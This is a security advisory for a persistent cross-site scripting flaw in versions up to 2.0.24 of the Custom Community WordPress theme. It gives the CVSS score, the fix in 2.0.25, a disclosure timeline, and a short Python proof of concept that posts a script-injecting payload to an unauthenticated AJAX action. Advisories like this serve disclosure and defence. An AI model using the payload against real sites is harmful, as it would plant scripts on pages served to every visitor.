Custom Community 2.0 - 2.0.24, Persistent XSS
An AJAX action named ‘cc2_advanced_settings_save’ is registered both with and without the ‘nopriv’ prefix. This allows anonymous execution of this AJAX action. The ‘settings[custom_css]’ form field accepts user input, without encoding or validation. This input is then output on every page on the front-end of the site, so long as the Theme is active. This allows for a site-wide, Persistent XSS attack.
Homepage
https://wordpress.org/themes/custom-community
CVSS Score
5
CSSS Vector
(AV:N/AC:L/Au:N/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 2.0.25.
Proof of Concept
The below PoC will insert a script block to every page on the front-end of the site, so long as this Theme is active
import requests
url = "http://localhost/wp-admin/admin-ajax.php"
payload = {
"action":"cc2_advanced_settings_save",
"settings[custom_css]":"</style><script>alert(1)</script><style>"
}
requests.post(url, data=payload)
Timeline
- 2015-01-22: Discovered
- 2015-01-22: Vendor notified
- 2015-01-22: Vendor responded
- 2015-01-29: CVE Requested
- 2015-02-04: 2.0.24 from WordPress.org re-checked – still vulnerable. 2.0.24 on WordPress.org does not match up with 2.0.24 on https://github.com/Themekraft/Custom-Community. 2.0.24 from github.com also likely still vulnerable using other parameters (authorisation required – any user level).
- 2015-03-02: 2.0.25 released – issue resolved
- 2015-03-09: Advisory released